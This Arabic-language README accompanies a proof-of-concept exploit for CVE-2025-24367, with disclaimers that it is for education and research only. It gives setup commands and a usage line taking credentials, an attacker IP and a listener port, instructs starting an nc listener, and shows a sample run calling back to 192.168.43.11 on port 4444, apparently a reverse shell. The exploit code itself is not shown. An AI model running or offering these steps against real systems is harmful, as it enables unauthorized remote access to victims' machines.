
إثبات المفهوم لـ CVE-2025-24367
هام — اقرأ هذا أولاً:
هذا المستودع وملفexploit.pyمقدمان لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود ضد أنظمة أو شبكات أو خدمات ليس لديك تصريح كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. باستخدام هذا الكود فإنك توافق على اتباع القوانين المعمول بها والسياسات المؤسسية.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
قبل تشغيل السكريبت تأكد من أن لديك مستمع nc يعمل. قم بتشغيل السكريبت بدون وكيل إلا عند التصحيح:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
تذكير أخير: هذا السكريبت وملف README مخصصان للاستخدام التعليمي فقط. لا تستخدم هذه الأدوات أبدًا للوصول غير القانوني إلى الأنظمة.